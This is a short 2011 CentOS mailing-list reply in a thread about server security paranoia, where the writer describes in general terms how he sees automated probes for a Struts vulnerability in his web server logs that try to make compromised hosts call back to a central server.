[CentOS] Am I being to paranoid?

Mon May 9 16:43:46 UTC 2011
Les Mikesell <lesmikesell at gmail.com>

On 5/9/2011 11:09 AM, Scott Silva wrote:
> on 5/8/2011 10:46 AM Jason spake the following:
>> Hi All,
>>
>> I want to know thoughts on if I am being to paranoid/security conscious.
>>
> <snip>
> You know what they say;
> "Just because you are paranoid does not mean that some one is NOT out to get you!"

I think the currently fashionable way to probe for vulnerabilities is to 
send URLs that will execute something that will contact a central server 
if they succeed, so it doesn't really matter what you do in the way of 
blocking/redirecting, etc.  They are probably going to ignore the return 
status and are already running on distributed compromised hosts.  At 
least that's the sort of thing I see regularly trying to exploit a 
struts vulnerability in our java web server's logs.

-- 
   Les Mikesell
    lesmikesell at gmail.com